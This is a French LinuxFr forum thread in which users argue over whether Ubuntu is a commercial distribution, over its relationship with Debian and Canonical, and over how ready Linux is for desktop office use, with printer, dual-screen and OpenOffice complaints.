                        À mon goût, le noyau d'Ubuntu est nettement trop récent pour être stable. Ceci dit, j'ai un peu de mal à considérer le moindre noyau 2.6 comme stable tellement la qualité ne va pas en s'améliorant de ce côté là. Ceci dit, cette partie de la phrase était pas spécifiquement sur Ubuntu (c'est une tendance générale des distributions qui releasent à dates fixes ou presque - Mandrake a été longuement spécialiste des kernels beta).

                        Effectivement, mais on a egalement pas de raison de se sentir directement aggresse

                        Je ne me sens agressé que quand des gens comme ramses passent aux attaques personnelles et balancent des propos comme "Debian est inutile". Ubuntu ne m'agresse pas : Ubuntu m'emmerde et me pose un certain nombre de problèmes. C'est bien différent.

                        En fait je me referais surtout ici a linuxfr ou pas mal de gens semblent vouloir parler au nom de leur distribution (voir plus bas effectivement ou quelqu'un affirme parler au nom de milliers de personnes...)

                        Je pense qu'il est aisé de dire que les contributeurs et utilisateurs de Debian seront assez peu contents de savoir que leur distribution est inutile (c'était dit très explicitement). J'autorise clairement Florent à parler en mon nom pour porter ce message - et je doute que ce ne soit pas le cas de la grande majorité.

                        Effectivement debian n'a pas de position publiquement affichée sur ubuntu.

                        Elle n'en a donc pas. Impossible de dégager une position d'une organisation rassemblant des milliers de gens sans avoir un processus de vote. Pas de raison donc de séparer "publiquement affichée" du reste.
                        • [^] # Re: Non Respect

                          Posté par (page perso) . Évalué à -2.

                          "C'est plus qu'hypothétique."
                          Je l'avoue, mais on a le droit d'espérer ;)

                          "c'est que parmi les utilisateurs récents et les nouveaux arrivants, on peut pas dire que l'esprit soit à la protestation contre ces pilotes non libres. Il y a six ans, ce n'était pas le cas."
                          Cela est certainement dû au fait que la plupart des nouveaux utilisateurs ne viennent pas pour le libre à la base mais pour le changement (pour diverses raisons). Je ne l'ai peut-être pas assez dit mais je suis complètement d'accord avec le fait qu'il faille éduquer ces utilisateurs, peu importe que cela soit avant ou après la migration.

                          "J'ai l'impression que tu sous-estimes grandement ceux qui font le tour de l'offre existante."
                          Je me base sur les utilisateurs qui visitent #ubuntu-fr, ainsi que quelques connaissances, et force est de constater que ceux qui essayent 4/5 distribs dans la semaine se retourneront vers leur OS propriétaire. J'ai bien l'impression que passer à GNU/Linux, c'est un coup de coeur :)

                          "Ceci dit, cette partie de la phrase était pas spécifiquement sur Ubuntu (c'est une tendance générale des distributions qui releasent à dates fixes ou presque - Mandrake a été longuement spécialiste des kernels beta)."
                          Ok, c'est donc un autre débat plus profond qui ne rentre pas dans ce cadre (mais qui doit surement être interressant pour qui à les connaissances necessaires)

                          "Elle n'en a donc pas."
                          Elle en a plutôt des centaines vu que chaque contributeur doit avoir sa propre opinion

                          En fait, le truc qui me trouble le plus dans ce débat est le fait que beaucoup ici critiquent énormément le travail des developpeurs embauchés par canonical. Selon eux (les dlfpiens ici presents)
                          - Il font un travail pourri par rapport à debian
                          - Il ne reverse pas les contributions à debian
                          Or la majorité de ces devs sont également des contributeurs pour debian. Je me demande donc ce qu'il en est réellement et je t'avoue que je ne me suis toujours pas fait d'idée tranchée malgré les quelques arguments exposés au fil des journaux.
                          En attendant j'adore toujours ubuntu car c'est la distrib qui m'a sensibilisée au libre (que je considerais auparavant dans un esprit "freeware" et pas plus) et j'espère qu'elle liberera encore de nombreux utilisateurs...
                        • [^] # Commentaire supprimé

                          Posté par . Évalué à 0.

                          Ce commentaire a été supprimé par l'équipe de modération.

                          • [^] # Re: Non Respect

                            Posté par (page perso) . Évalué à 2.

                            Tu noteras dans la phrase complète (passent aux attaques personnelles et balancent des propos comme "Debian est inutile") l'utilisation de la conjonction de coordination et, qui permet de mettre en relation deux éléments qui ont la même fonction syntaxique. Ces deux éléments ne sont pour autant pas forcément les mêmes.

                            En clair, les attaques personnelles sont distinctes de la phrase Debian est inutile, qui renferme suffisamment d'imbécilité en elle-même.
          • [^] # Re: Non Respect

            Posté par . Évalué à 2.

            On en va peut-être pas trainé sur le sujet, mais je suis allez sur les liens que tu as fournis.
            Je n'ai rien vu de comparable à ce qui c'est passé ici au moment où j'ai posté mon commentaire.
            Tu donnes en plus ce qui est amusant, la comparaison avec Mandriva qui fut un temps était la distribution dont tout le monde parlé sur ce site et qui avait un peu tendance à écraser toutes les autres.
            Des Mandriviens suporteraient-ils mal d'avoir perdu leur status d'idole du site ?

            Je ne pense pas que les ubuntuistes parle forcément plus de leur distribution que les autres. Il sont juste actuellement plus nombreux, donc la masse de commentaire est plus importante, et ceux quelque soit la raison de ce nombre (qualité intrinseque de la distribution, effet de mode...)

            Il y a aussi une autre raison je pense à cette entousiasme sur ubuntu. C'est que, même si je la trouve interessante pour un utitilisateur habitué à Linux et aux autres distributions (j'ai passé plus 6 mois sur Mandrake, Gentoo et Debian), elle attire aussi beaucoup de débutant pour qui c'est la découverte de Linux (ceci avec sa phase d'euphorie que l'on à tous pu connaitre sinon on serait retourné sous Windows) ce qui entraine peut-être des commentaires plus pationnés.

            Mais je pense que si l'apparition de commentaire sur Ubuntu dérange (par exemple sur ceux de Mandriva, vu que ce sont eux qui sont cité), il eu sans doute était plus civilisé de demander poliment de laisser la news parler de Mandriva et non d'Ubuntu.

            Je tiens enfin à préciser que je n'ai rien contre les utilisateurs de Mandriva, l'exemple est juste tombé dessus.
            Je trouve juste dommage de voir des news quelqu'elle soit (j'aurais fait la même remarque si j'avais vu une news pourrit comme cela par des Ubuntutiste) dévalorisé de cette façon.

            Il n'est sans doute pas facile de rédiger une news, et cela ne doit pas être agréable après le temps passé, de la voir massacrée de la sorte.
      • [^] # Re: Non Respect

        Posté par . Évalué à 0.

        je pense pas avoir vu des ubuntistes pourrir des news d'autre distributions avec une telle magnitude.
        • [^] # Re: Non Respect

          Posté par (page perso) . Évalué à -1.

          Personnellement ce qui me dérange avec ubuntu c'est justement le fait qu'elle prenne toute la place.
          avec son coffret joli et envoyé gratuitement, le fait qu'elle marche bien, il n'y a pas de raison d'installer autre chose, du moins à première vue.

          Ubuntu qui maintenant se tourne vers l'éducation, les machines anciennes, etc..
          Comme je dit, Il n'y a apparament pas de raison d'utiliser autre chose.

          Ubuntu, Ubuntu, ubuntu....

          Il est évident que pour un utilisateur africain ou d'amérique du sud qui n'a pas de gros moyen, recevoir les cdroms gratuitement est un plus.

          Donc on voit des Ubuntus partout.

          D'autres distributions sont faciles à installer, au moins aussi faciles, Suse, Mandriva, Zenwalk (avec moins de reconnaissance matériel), et pas loin derrière knoppix et ses filles (freeduc, kaella,...) si on veut bien faire 2 ou 3 commandes expliquées sur internet.

          Installer d'autres logiciel est facile sous Mandriva ou Suse depuis des années, quoiqu'en dise l'annonce. La reconnaissance matérielle est au moins aussi bonne.
          Ubuntu aussi a des bug et j'ai vu des portables qui refusaient simplement de l'installer quand d'autres distributions passaient à l'aise (ét réciproquement).

          Les raisons du succés de Ubuntu sont à mon avis:
          1° et principalement le coffret de cédérom gratuits
          2° la nouveauté, qui permet de dire aux "anciens" <<nous ne faisons pas comme vous avec votre mandrake/suse, red hat/... pourie>> avec les luttes d'influences dans les LUG ou ces distributions ont été instrumentalisées.
          3°) la qualité de cette distribution qui venant aprés les autres profite du travail et des erreurs des autres pour se positionner.

          Quelque soit la contibution des utilisateurs, à la base, la Ubuntu n'a pas été faite pour rendre service aux gens en proposant une distribution linux facile à utiliser par les débutants.
          C'est un moyen, pas un but.
          Rapellez vous. c'est exactement le même argument qui a fait que dans les années 70-80 microsoft a été présenté comme le gentil qui veut offrir un système facile pour les utilisateurs qu'il avait compris, face au méchant big machin IBM.

          Ubuntu est faite pour que tout le monde l'utilise et qu'il n'y ait pas de raison d'utiliser autre chose.

          Ubuntu est une OPA sur GNU/Linux.

          Reflechissez. On ne peut pas acheter l'entreprise GNU/Linux &Co. Mais si on voulait maîtriser, acheter le phénomène Linux, on s'y prendrait ainsi. On mettrai des moyens pour une distribution qui serait facile conviviale et en s'arrengant pour qu'elle soit offerte à tout le monde, plus accéssible (le coffret de cdroms), mais en gardans sous controle l'outil pour choisir ce qu'il y a dedans.

          Ensuite, une fois que les autres ont été marginalisées, ce qui est en train de se faire et était prévisible, on se retrouve seul possesseur de l'outils pour fabriquer une distribution, et on peut y mettre ce que l'on veut.

          Par ailleur, entre temps on a pompé les ressources des autres distribution, particulièrement debian, en recrutant leurs contributeurs, leurs ressources humaines, et en mobilisant la communauté pour diffuser et promouvoir cette distribution si "cool".
          De toutes façons les autres distributions commerciales, une fois marginalisées, n'aurront plus les moyens du milliardaire de l'Ile de Man pour recruter.

          Ensuite il y a plusieurs possibilité, mais encore une fois, on peut craidre de voir se constituer un monopole.

          VRP au noir?
          Je pense que dans les LUG, nous ne devons pas faire la promotion d'une seule distribution commerciale.
          Déja on peut nous accuser de travail au noir, ou d'atteinte à la concurence, etc.. le risque est faible, mais certaines boites de logiciels propriétaire ont de nombreux avocats pour ces bétises.
          Même lors de la Mandriva Party, j'ai fait attention à montrer d'autres distribution.
          ( J'en ai d'ailleur averti les gens de Mandriva.)
          • [^] # Re: Non Respect

            Posté par (page perso) . Évalué à 0.

            "Quelque soit la contibution des utilisateurs, à la base, la Ubuntu n'a pas été faite pour rendre service aux gens en proposant une distribution linux facile à utiliser par les débutants."

            Soit je n'ai pas compris le sens de ta phrase et le mot souligné, soit c'est toi qui n'a rien compris mais alors rien du tout.

            "Je pense que dans les LUG, nous ne devons pas faire la promotion d'une seule distribution commerciale."

            Bonne nouvelle, ubuntu n'est pas une distrib commerciale.


            En fait, j'espère vraiment que tu ne penses pas ce que tu a ecris parce que la on dirait une crise de jalousie.

            Et aussi, l'argument de "ubuntu reprend ce que font les autres, c'est pas bien" ca me rappele (en pire) les gens qui ralent parce que des mechantes entreprises proprio reprennent du code sous licence BSD.
            • [^] # Re: Non Respect

              Posté par . Évalué à 2.

              Bonne nouvelle, ubuntu n'est pas une distrib commerciale.

              Faudrait savoir. D'un coté on nous dit qu'elle n'est pas commerciale, de l'autre on se gargarise du fait que c'est développé par une entreprise de professionels (Canonical) et que c'est un avantage par rapport aux distributions communautaires comme Debian, pour le support, etc...

              Et aussi, l'argument de "ubuntu reprend ce que font les autres, c'est pas bien" ca me rappele (en pire) les gens qui ralent parce que des mechantes entreprises proprio reprennent du code sous licence BSD.

              La différence c'est que les entreprises proprio dont tu parles n'ont pas de page du genre http://www.ubuntu.com/ubuntu/relationship pour vanter les mérites de leur collaboration avec le projet.
              • [^] # Re: Non Respect

                Posté par . Évalué à 1.

                > on se gargarise du fait que c'est développé par une entreprise de professionels (Canonical)

                Tatata, contrairement à Mandriva ou RedHat, l'entreprise Canonical se pose plus comme un participant du développement en fournissant de l'hébergement que comme un marionnettiste. Parcontre, launchpad est clairement le point noir de cette politique. M'enfin quand on participe à ubuntu, ce n'est pas les gentils utilisateurs qui demande à Canonical si il peuvent faire ceci cela, il s'agit vraiment d'une collaboration.
            • [^] # Re: Non Respect

              Posté par . Évalué à 5.

              Bonne nouvelle, ubuntu n'est pas une distrib commerciale.

              Vu sur http://www.ubuntu.com/ubuntu :
              « Unlike many of the other commercial distributions in the free and open source world (Libranet, Lindows, Xandros, Red Hat) the Ubuntu team ...»

              Et puis il n'y a pas de contradiction entre distrbution commerciale et distribution gratuite, cf. Mandriva etc.
              • [^] # Re: Non Respect

                Posté par (page perso) . Évalué à -1.

                Je vois pas en quoi cette phrase signifie que ubuntu == distrib commerciale.

                Et puis le produit principal de Mandriva n'est pas gratuit, or "Ubuntu is Free Software, and available to you free of charge". Et sur d'autres endroits du site on indique bien qu'elle restera toujours gratuite.

                Et comme d'après wikipedia "Le commerce désigne l'ensemble des opérations lucratives comprenant l'échange et la circulation de produits et services de l'endroit de leur production vers le lieu de leur consommation"

                commercial se dirait donc d'un produit/service destine a être vendu.

                Donc ubuntu != distribution commerciale

                Canonical restant une "entreprise commerciale" banale.
                • [^] # Re: Non Respect

                  Posté par (page perso) . Évalué à 3.

                  Je vois pas en quoi cette phrase signifie que ubuntu == distrib commerciale.

                  Traduction libre :
                  "Comme les autres distributions commerciales [...], Ubuntu [...]"

                  C'est le "other" qui indique clairement qu'Ubuntu est une distribution commerciale.

                  commercial se dirait donc d'un produit/service destine a être vendu.

                  Ubuntu est bien à but lucratif, mais l'argent se fait sur autre chose que les CDs.
                  (comme Mandriva est à but lucratif, mais l'argent se fait sur autre chose que la version disponible en téléchargement).
                  • [^] # Re: Non Respect

                    Posté par . Évalué à 1.

                    La traduction serait plutot "Contrairement aux autres...". Et la c'est le "other" qui implique qu'Ubuntu est aussi une distrib commerciale, au meme titre que celles citees.

                    Ubuntu est bien à but lucratif, mais l'argent se fait sur autre chose que les CDs.

                    En fait c'est plus sioux que ca. Techniquement, Ubuntu depend de la fondation Ubuntu, qui n'est pas une entreprise commerciale. Par contre, la fondation est dirigee par un Council, constitue de MS, 2 employes Cannonical et un ex-employe. Et les domaines ubuntu.com et ubuntulinux.org sont la propriete de Canonical, ainsi que kubuntu.{com,org}.

                    En parlant de noms de domaines, ils sont meme proprietaires de utnubu.org, depose une heure apres l'annonce de la creation du projet utnubu sur debian-project[1].

                    [1] http://lists.alioth.debian.org/pipermail/utnubu-discuss/2006(...)
                  • [^] # Re: Non Respect

                    Posté par (page perso) . Évalué à 0.

                    "Ubuntu est bien à but lucratif, mais l'argent se fait sur autre chose que les CDs."

                    Sur quoi? Si tu parles du support, c'est canonical qui s'en occupe et pas ubuntu.
                    • [^] # Re: Non Respect

                      Posté par (page perso) . Évalué à 0.

                      Ubuntu est une distribution commerciale car développée principalement par une boîte qui veut faire de l'argent.
                      Ça te va comme ça ?
                      • [^] # Re: Non Respect

                        Posté par (page perso) . Évalué à 2.

                        Ben non.
                        IBM est une entreprise, elle embauche des gens pour developper le noyau linux. Le projet Linux serait donc commercial? (il y a de très nombreux autres exemple ou les boites sont encore plus investies dans le developpement)
                        • [^] # Re: Non Respect

                          Posté par (page perso) . Évalué à 0.

                          Tu es un peu de mauvaise foi quand même.
                          Linux n'est pas principalement développée par IBM, ça se saurait.
                          Ubuntu a été créée par Canonical pour faire de l'argent. Ça n'en fait pas forcément quelque chose de mauvais, mais c'est un fait.
                          C'est rigolo que tu n'acceptes rien qui ailles à l'encontre de l'image que tu as de ta distrib.
                          • [^] # Re: Non Respect

                            Posté par (page perso) . Évalué à 4.

                            Ubuntu a été créé par Mark Shuttlework, et ce n'est pas pour faire de l'argent (il en a deja assez). Si canonical existe c'est pour permettre un financement à long terme de la fondation.

                            Je ne dis pas qu'une distrib commerciale est mauvaise (même si l'aspect commercial apporte des mauvais points), mais simplement ubuntu n'est pas une distrib commerciale, elle est juste soutenue par une entreprise.

                            Je ne vois pas en quoi je rejette tous les mauvais points de "ma" distrib, il y a quelques arguments et points de vue qui ont montré des points négatifs d'ubuntu et que j'ai assimilé, c'est juste qu'ici c'est faux.
                            • [^] # Re: Non Respect

                              Posté par (page perso) . Évalué à 1.

                              Si canonical existe c'est pour permettre un financement à long terme de la fondation.

                              C'est ce que j'appelle une distribution commerciale. C'est le but de toute entreprise : gagner de l'argent pour assurer sa viabilité sur le long terme.
                              Une distribution commerciale n'est pas nécessairement une distribution payante, c'est une distribution développée principalement par des gens payés pour.

                              c'est juste qu'ici c'est faux

                              C'est pas moi qui l'ai dit, c'est le site ubuntu.com.
                              • [^] # Re: Non Respect

                                Posté par (page perso) . Évalué à 0.

                                "C'est ce que j'appelle une distribution commerciale."

                                Ca commence à devenir lourd ce faux débat. Je parle d'ubuntu et toi de canonical

                                "Une distribution commerciale n'est pas nécessairement une distribution payante, c'est une distribution développée principalement par des gens payés pour."

                                Commercial veut dire qui a pour but d'être échangé contre de l'argent. Comment une distrib gratuite à jamais peut être commerciale? Et comment ubuntu peut-om être un projet commercial alors qu'il ne propose que du support gratuit et une distrib gratuite à jamais?
                                • [^] # Re: Non Respect

                                  Posté par . Évalué à 0.

                                  Et les quotidiens 20 minutes et métro disponibles gratuitement dans le métro à Paris ? ce sont des associations qui les écrivent ? non, ce sont des société commerciales et qui pourtant donnent leurs journaux.

                                  Ubuntu est bien une distribution commerciale jusqu'à preuve du contraire
                                  • [^] # Re: Non Respect

                                    Posté par (page perso) . Évalué à 0.

                                    Pas vraiment de rapport
                                    Ces societes les editent en voulant faire de la thune (cela passe par la pub)

                                    Tu as vu la fondation ubuntu mettre de la pub dans ubuntu?
                                  • [^] # Re: Non Respect

                                    Posté par . Évalué à -1.

                                    Oui. Disons que c'est une distribution à but commercial comme mandriva, suse/opensuse ou redhat/fedora.
            • [^] # Re: Non Respect

              Posté par (page perso) . Évalué à 5.

              "Quelque soit la contibution des utilisateurs, à la base, la Ubuntu n'a pas été faite pour rendre service aux gens en proposant une distribution linux facile à utiliser par les débutants."

              Soit je n'ai pas compris le sens de ta phrase et le mot souligné, soit c'est toi qui n'a rien compris mais alors rien du tout.


              Il ne faut pas être complètement naïf, même si à l'inverse être complètement cynique ne rend pas plus lucide.

              Marc S. est un homme d'affaire. Son entreprise est dans un paradis fiscal ou se passent de nombreux trafics, l'ile de Man.
              Peut on croire réellement qu'il dévellope Ubuntu pour rendre service?
              Peut on croire réellement qu'il inonde la planète de cédéroms pour rendre service?
              Peut on croire réellement que c'est par pur hasard qu'il utilise et capte les ressources de Debian comme le montrent les messages plus haut?

              Si tout le monde utilise Ubuntu, si dans les esprit il y a une équation claire GNU/Linux = Ubuntu, alors à la fin, les entreprises, les administrations, utiliseront très majoritairement les produits de la société référence cannonical.

              Et Marc S. gagnera beaucoup d'argent.

              Cette distribution à perte de cédéroms, on appelle ça du dumping.

              Rien de ce que l'on peut observer du phénomène Ubuntu n'échappe à la logique des affaires.

              Je le répète, même si je sais que mon message sera moissé comme le précédent. Bien sûr, que ubuntu est une OPA sur GNU/Linux.
              • [^] # Re: Non Respect

                Posté par . Évalué à 0.

                Même si ton raisonnement est juste (ce qui est peut être le cas), il lui reste qd même à couler Novell/Suse et RedHat (et un peu Mandriva) avant que son OPA ne soit concluante, donc c'est qd même loin d'être gagné dans le contexte actuel.

                De plus, je dirai que la GPL fait que GNU/Linux est globalement insensible aux OPA, il pourra toujours y avoir des distribs alternatives (y a qu'à voir Slackware, qui tourne avec un personnel bcp plus réduit que celui de Debian ;)
              • [^] # Re: Non Respect

                Posté par (page perso) . Évalué à 3.

                > Marc S. est un homme d'affaire. Son entreprise est dans un paradis fiscal ou se passent de nombreux trafics, l'ile de Man.

                Bah, l'entreprise de Largo Winch aussi, elle est sur un paradis fiscal, pourtant, c'est un gentil ^_^.
          • [^] # Re: [HS] Non Respect

            Posté par . Évalué à 2.

            Rapellez vous. c'est exactement le même argument qui a fait que dans les années 70-80 microsoft a été présenté comme le gentil qui veut offrir un système facile pour les utilisateurs qu'il avait compris, face au méchant big machin IBM

            En fait, c'est parce que IBM ne voulait pas depenser d'argent pour faire l'OS de leur PC, qu'ils ont demandé à SUN microsystem, qui a refusé... IBM c'est donc tourné vers une petite PME du logiciel à l'époque : microsoft. Cette dernière a repompé 80% du code de CP/M pour faire DOS 1.0 (4000 lignes d'assembleur).
            Pour les années, c'était début des années 1980.

            A+
            Anthony
            • [^] # Re: [HS] Non Respect

              Posté par (page perso) . Évalué à 2.

              En fait il me semble qu'ils ont demandé à Digital Research plutôt, l'éditeur du CP/M (qui a fait ensuite DR-Dos, mais trop tard) et MS a racheté le QDos (Quick & Dirty OS), "inspiré" du CP/M. Le PC est sorti en 81 si ma mémoire est bonne.

              On doit trouver ce genre d'infos sur Wikipedia et aussi dans le documentaire "Les Cinglés de L'informatique" (et peut-être dans "les pirates de la Silicon Valley" ?).
          • [^] # Re: Non Respect

            Posté par . Évalué à 2.

            Personnellement,
            je trouve que les autres distributions devraient un peu se remuer le cul.

            Effectivement, ubuntu n'est pas aussi rose au niveau stabilité, bugs, ... que l'on pourrait croire.

            Toutefois, je vois une chose de terriblement positive à porpos d'Ubuntu, c'est que ça ramène un peu Linux sur le devant de la scène, ça ramène de l'excitation au point ou des journaux ne parlant habituellement jamais de linux se mettent à balancer deux pages sur les bienfaits d'Ubuntu et de l'alternative linux face aux logiciels propriétaires.

            Grâce à Ubuntu, j'ai eu le plaisir, lors d'une réeunion de famille de me rendre compte qu'un bon nombre de mes cousins étaient passés sous linux et poussaient linux dans les administrations et sociétés où ils bossaient, et ce même si tous ne sont pas informaticiens...

            Ubuntu occupe toute la place?
            Je pense plutôt qu'Ubuntu occupe la place que les autres distributions n'ont pas su ou n'ont pas voulu occuper. Les SuSE, Mandriva et redhat n'ont qu'à s'en prendre à elles-mêmes si elles n'occupent pas cette place.

            Ubuntu est faite pour que tout le monde l'utilise et qu'il n'y ait pas de raison d'utiliser autre chose.


            Ben des raisons d'utiliser d'autres distributions, il y en a, surtout en millieu professionnel. Maintenant, c'est aux autres distributions de montrer aussi leur valeur et de convaincre le consommateur qu'ils ont un intéret à utiliser Mandriva, SuSE, Fedora/RedHat, ... Au boulot, par exemple, la majorité des serveurs est sous RedHat (il y a un peu de SuSE)... par contre, pour les postes de travail non-windows (c-à-d 0,001% du parc), c'est ubuntu qui commence à s'implanter.

            Ubuntu est une OPA sur GNU/Linux?

            Je pense que même si ça l'était, le risque est minime que celà marche. Il ne faut pas sousestimer la capacité de la communauté GNU/Linux à promouvoir les alternatives et à emprunter d'autres chemins lorsque la direction empruntée s'avère mauvaise.

            Je pense que franchement, il faut arrèter de noircir le tableau pour le plaisir de le noircir.

            Ubuntu est occupé à offrir le momentum que certains supporters de linux attendent depuis plus de 10 ans. Au lieu de lutter contre Ubuntu, ne vaudrait-il pas mieux utiliser la brèche faite dans la carapace des médias grand public pour mettre plus en avant le reste du monde du logiciel libre? Ne vaudrait-il pas mieux surfer sur la vague et lancer une "linuxmania" auprès du grand public, montrer des linux de toutes les couleurs, de tous les genres, ... ?
          • [^] # Re: Non Respect

            Posté par . Évalué à 5.

            C'est de l'ironie ?

            Parce que peut être que shuttleworth n'est pas un saint et qu'il veut effectivement atteindre un but de domination du monde, de l'information, des pensées, mais tu ne peux peut pas nier que :
            1)cette distribution fonctionne bien (enfin pour moi)
            2)elle est à jour au niveau logiciel et les logiciels fourni de base sont relativement bien intégré.
            3)que tu peux la forker, sauf launchpad mais il est loin, trés loin d'être indispensable à son utilisation.
            4)On a fait chanter les developpeurs de debian pour qu'ils travaillent la bas ?

            Enfin faut arrêter de voir la théorie du complot partout, bien entendu que les mecs de ubuntu veulent être les premiers, les meilleurs. Il faut bien rentrer des sous. Ils vont pas mettre plein d'argent dans un projet et attendre de voir si des gentils gens de la communauté vont leur faire un don par paypal pour qu'ils puissent manger.
            • [^] # Re: Non Respect

              Posté par (page perso) . Évalué à -2.

              faut arrêter de ne vouloir voir que la partie émergée de l'iceberg

              M.
              • [^] # Re: Non Respect

                Posté par . Évalué à 6.

                Et c'est quoi la partie immergée ? Des développeurs qui se reunissent dans un repere secret aidé de minus et cortex pour discuter de leur seule occupation : dominer le monde.
              • [^] # Commentaire supprimé

                Posté par . Évalué à 4.

                Ce commentaire a été supprimé par l'équipe de modération.

            • [^] # Re: Non Respect

              Posté par . Évalué à -1.

              Tes arguments 1), 2) et 3) sont valables pour n'importe quelle distribution récente.
  • # pas encore prêt

    Posté par . Évalué à 0.

    Je suis un utilisateur pro-linux.

    J'ai deux serveurs Debian et Ubuntu sur mon portable.

    Pourtant, je commence à desespérer.

    En voulant l'installer sur mon fixe, en poste bureautique, c'est un vrai constat d'échec.

    Ma femme, absolument pas spécialiste, en est mécontente.
    Les problèmes ont commencé avec mon imprimante, une canon i350 => obligé de passer par la case Turboprint, qui est une bouse absolue.
    Non seulement c'est moche mais c'est pas fonctionnel. Tant qu'on imprime du texte en A4, ok, mais ça reste muet dès qu'on veut imprimer sur d'autres formats. Bref, beaucoup de pertes de fonctionnalités.
    Idem avec ma carte ATI. Non seulement la configuration du dualscreen m'a bouffé du temps, mais le résultat est décevant et buggé.
    Autre bug ATI auquel j'ai contribué : ttps://launchpad.net/bugs/47371
    Sans parler de la masse de document word que ma femme possède et qui merdouillent avec Open Office : mise en page à se retaper, caractères manquant... Hors de question de tout retoucher !
    Sans parler de la lourdeur de cette application et de ses fonctions quand même assez limitées.
    Skype ? pareil, bricolage indispensable pour le faire fonctionner correctement.
    Pour remplacer Visio, je n'ai que le triste Dia. NVU ne souffre pas la comparaison avec Dreamweaver...

    Bref, me voilà obligé de faire un regrettable retour arrière sur ce PC, alors que je voudrais jeter windows aux orties.

    En tant que professionel, j'adore Linux. En tant que geek, j'adore Linux.
    Mais pour la bureautique... si je peux m'en contenter (comme sur mon portable), je ne me vois pas le conseiller à des non spécialistes.

    Ils seront dégoutés en peu de temps et à tout jamais.

    Bref, je commence à m'inquiéter car je réalise que les progrès sont lents, les même défauts persistent malgré des qualités extraordinaires... et vista arrive bientôt.

    Vite, ou se sera trop tard !
    • [^] # Re: pas encore prêt

      Posté par . Évalué à 6.

      lève-toi et contribue.
      • [^] # Re: pas encore prêt

        Posté par . Évalué à 5.

        Je sens une pointe d'ironie, pour ne pas dire d'agressivité, mais je m'en fiche.
        Malheureusement, je n'en suis pas capable. Du moins pas encore, je suis un jeune et pauvre ingé réseau, et en développement je vaux pas grand chose.
        Alors que puis-je faire ? Je contribue à ma façon en faisant la promotion, en aidant dans les forums, mais bon... A un moment donné, il faut bien admettre que linux ne convient pas encore à tous les usages.

        Au fait, tu contribues en quoi toi ?
        • [^] # Re: pas encore prêt

          Posté par . Évalué à -7.

          Tu sais, quand Linus a écrit Linux, il était étudiant, et pour ce que je sais, beaucoup de contributeurs ont moins de 25 ans, et tu peux contribuer sans que ce soit forcément technique (traductions, rapports de bug,...). Alors ton "jeune et pauvre ingé réseau", tu peux te le mettre où je pense.
        • [^] # Re: pas encore prêt

          Posté par . Évalué à 5.

          même pas. j'ai juste hésité 30 secondes avec "lève-toi et code" qui lui est trop restrictif.
    • [^] # Re: pas encore prêt

      Posté par . Évalué à 1.

      Trop tard pour quoi ? GNU/Linux propose déjà beaucoup de choses qui fonctionnent très bien et avec le modèle du libre on est sur qu'on ne perdra jamais tout cela.

      De plus le monde du iibre n'a jamais été autant actif ...

      tout ce que va faire win_vista c'est de remplacer une partie des winXP et pis voila...
      • [^] # Re: pas encore prêt

        Posté par . Évalué à 2.

        Pour ceux qui ont un 1Go de Ram, de l'argent à perdre et un amour immodéré des bogues...
    • [^] # Re: pas encore prêt

      Posté par (page perso) . Évalué à 10.

      Je ne vois pas pourquoi un non-specialiste se plaindrait de dia que je trouve très bien fait.
      Je vois pas pourquoi un non-specialiste se plaindrait de openoffice pour taper son courrier et ses cvs pour les enregistrer dans un format ouvert. Je pense même qu'il sera content de pouvoir les exporter en pdf en un clic.
      Je ne pense pas qu'un non-specialiste ait besoin de dreamweaver. Si il veut creer une page web basique, il pourra utiliser nvu qui n'est pas trop mal fait. Sinon il pourra toujours apprendre le html/css/js et ecrire ses pages avec un des nombreux editeurs de texte comme bluefish par exemple.

      Concernant tes problèmes de materiel j'en suis desole mais je n'ai personellement eu aucun problème a installer mon imprimante hp et a obtenir le dual screen avec ma carte nvidia (d'ailleurs le dual screen sous windows est assez pourri, l'ecran s'eteind, se rallume sans arret, c'est quasi-impossible de regarder une video sur le 2e ecran de manière "simple" etc)

      Bref, me voila satisfait de ma distribution Linux que je conseille à tout VRAI debutant qui veut s'initier à l'informatique

      Je pense qu'essayer de retrouver un clone de son sytème proprietaire et de ses logiciels est une très mauvaise approche, d'ailleurs il est reconnu (même si aucune etude n'a ete faite) que les debutants purs s'en sortent mieux sur gnome/kde que d'autres personnes qui ont des (mauvais) habitudes et reflexes acquis avec des logiciels proprietaires
      • [^] # Re: pas encore prêt

        Posté par . Évalué à 1.

        Ce que tu dis ressemble à du troll. As tu jamais fait un tour sur les forums, concernant le matériel ?

        Pareil pour Windows, je n'ai jamais eu de pb avec le dual screen alors que tu ne peux pas nier que pour avoir le dualscreen sur linux tu dois bricoler ton xorg.conf. Vas expliquer comment faire à ta grand-mère !

        Vas expliquer au débutant que son imprimante qui marchait bien n'est plus fonctionnel, mais que c'est la faute aux constructeurs et que donc il doit rester avec linux quand même. Il en a rien à cirer le mec ! Il a payé son imprimante et il veut qu'elle marche !

        Pour tes commentaires sur Open Office ou NVU, tu fais preuve d'un manque d'ouverture d'esprit car tout le monde n'a pas la même utilisation de ces outils que toi, et si tu les utilises vraiment en 10 minutes il est facile de trouver les manques.
        Tu sais on peut être non spécialiste en informatique mais avoir des besoins avancés sur l'un ou sur l'autre, ou avoir besoin d'une interface ou de fonctionnalités qui permettent justement des choses impossibles ou trop compliquées autrement.
        • [^] # Re: pas encore prêt

          Posté par . Évalué à -2.

          pour avoir le dualscreen sur linux tu dois bricoler ton xorg.conf. Vas expliquer comment faire à ta grand-mère !

          On échange de grand mère ?
        • [^] # Re: pas encore prêt

          Posté par (page perso) . Évalué à 3.

          Pour tes commentaires sur Open Office ou NVU, tu fais preuve d'un manque d'ouverture d'esprit car tout le monde n'a pas la même utilisation de ces outils que toi, et si tu les utilises vraiment en 10 minutes il est facile de trouver les manques.
          Tu sais on peut être non spécialiste en informatique mais avoir des besoins avancés sur l'un ou sur l'autre, ou avoir besoin d'une interface ou de fonctionnalités qui permettent justement des choses impossibles ou trop compliquées autrement.


          Je veux bien que tu nous en mentionnes avec le pourquoi et tout.
          Parce que j'utilise quotidiennement OpenOffice pour réaliser des documents d'exploitation et je n'ai pas de problèmes.
          Ce serait plutôt lié à des soucis de workflow pour travailler en équipe mais bon "on n'a pas le temps de tester Alfresco"(tm).
          Pour notre part, on utilise abondamment les document-maître, les modifications et ce sont loin d'être des exemples de fonctionnalités couramment utilisées pour éditer son CV chez soi.
          En fait, les principaux problèmes rencontrés sont davantage liés à l'import de documents Word (souvent mal ficelés ou abusant des macros) qu'autre chose.
        • [^] # Re: pas encore prêt

          Posté par (page perso) . Évalué à 9.

